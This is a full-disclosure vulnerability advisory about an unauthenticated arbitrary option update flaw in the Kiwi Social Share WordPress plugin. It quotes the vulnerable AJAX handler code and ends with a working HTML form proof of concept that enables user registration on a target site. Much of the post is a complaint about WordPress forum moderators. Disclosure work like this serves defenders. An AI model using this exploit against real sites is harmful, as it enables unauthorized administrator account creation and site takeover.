Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, unfortunately so far that hasn’t happened. Instead they have continued apace doing downright strange stuff, like deleting people just saying thank you, and inappropriate stuff, like continuing to violate their own guidelines to promote certain security companies to clean up hacked websites (and lying in the process since the companies they promote as “reputable” are any but, as one of them lies all the time and the other doesn’t even attempt to properly clean up hacked websites). Now comes the time when their refusal to clean up their act is likely to have a huge consequence.
Last week an option update vulnerability in the plugin WP GDPR Compliance was widely exploited after it was fixed. After that happened we went to do some checks over the 1,000 most popular WordPress plugins related to that, while looking into improving our automated tool for detecting possible security issues in plugin, the Plugin Security Checker, and we found that the plugin Kiwi Social Share also has the same type of vulnerability.
In this case of this plugin the code is even easier to access than the other plugin. In the file /includes/lib/helpers/class-kiwi-social-share-helper.php the function kiwi_social_share_set_option() is made available through WordPress AJAX functionality whether the request is coming from someone logged in to WordPress or not:
420
421
| add_action( 'wp_ajax_kiwi_social_share_set_option', 'kiwi_social_share_set_option' );
add_action( 'wp_ajax_nopriv_kiwi_social_share_set_option', 'kiwi_social_share_set_option' ); |
add_action( 'wp_ajax_kiwi_social_share_set_option', 'kiwi_social_share_set_option' );
add_action( 'wp_ajax_nopriv_kiwi_social_share_set_option', 'kiwi_social_share_set_option' );
While the code is a bit hard to make out, which might have allowed this to remain noticed from its introduction in May of last year until now, it will allow an arbitrary WordPress option to be updated to arbitrary values based on user input sent with a request, which hackers then can use to create new Administrator accounts, as well as other things:
435
436
437
438
439
440
441
442
443
444
| function kiwi_social_share_set_option() {
if ( ! empty( $_POST ) && $_POST['action'] === 'kiwi_social_share_set_option' ) {
$option = get_option( $_POST['args']['group'] );
$option[ $_POST['args']['option'] ] = $_POST['args']['value'];
update_option( $_POST['args']['group'], $option );
wp_die( 'Success' );
}
wp_die( 'Forbidden' );
} |
function kiwi_social_share_set_option() {
if ( ! empty( $_POST ) && $_POST['action'] === 'kiwi_social_share_set_option' ) {
$option = get_option( $_POST['args']['group'] );
$option[ $_POST['args']['option'] ] = $_POST['args']['value'];
update_option( $_POST['args']['group'], $option );
wp_die( 'Success' );
}
wp_die( 'Forbidden' );
}
Since the moderation of the Support Forum hasn’t been cleaned up, we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon) and they stop causing websites to be put at risk like this anymore. Though that may not happen, considering the moderators are abusing their power to promote certain security companies cleaning up hacked websites while getting in the way of those actually trying to fix security issues that could lead to websites being hacked.
If you were using our service and this plugin you would likely to have been warned about this issue before you were reading this.
Our Plugin Security Checker already was able to catch the possibility of this type of vulnerability with code like was in a plugin that was widely exploited a couple of years ago. We have now added a check for the variant in this plugin and we will monitor what that flags in plugins to see if we can improve that. In addition we have added a more expansive check to our proactive monitoring of changes made to plugins in the Plugin Directory to try to catch serious vulnerabilities before they are exploited, which should also allow us to see if we can improve that new check.
Tomorrow we are going to be disclosing a less serious vulnerability in a security plugin that we noticed while looking over 1,000 most popular plugins for something related to another serious vulnerability that had been in WP GDPR Compliance. That is unless the WordPress folks move to clean up their act between now and then (which we hope they do).
Proof of Concept
The following proof of concept will turn on user registration.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="kiwi_social_share_set_option" />
<input type="hidden" name="args[group]" value="users_can_register" />
<input type="hidden" name="args[value]" value="1" />
<input type="submit" value="Submit" />
</form>
</body>
</html>